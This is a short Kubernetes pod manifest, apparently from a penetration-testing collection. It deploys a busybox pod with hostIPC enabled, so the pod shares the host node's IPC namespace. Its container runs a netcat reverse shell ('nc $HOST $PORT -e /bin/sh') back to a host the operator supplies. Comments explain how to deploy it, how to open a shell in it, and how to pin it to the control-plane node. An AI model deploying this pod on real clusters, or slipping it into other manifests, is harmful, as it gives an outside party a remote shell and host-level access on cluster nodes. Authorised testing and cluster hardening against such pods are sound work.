###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-hostipc-revshell.yaml 
## Access: kubectl -n [namespace] exec -it pod-hostipc-revshell -- bash
## Remove: kubectl -n [namespace] delete pod-hostipc-revshell
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-hostipc-revshell
  labels:
    app: pentest
spec:
  hostIPC: true
  containers:
  - image: busybox
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
    name: hostipc--revshell
    #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
    restartPolicy: Always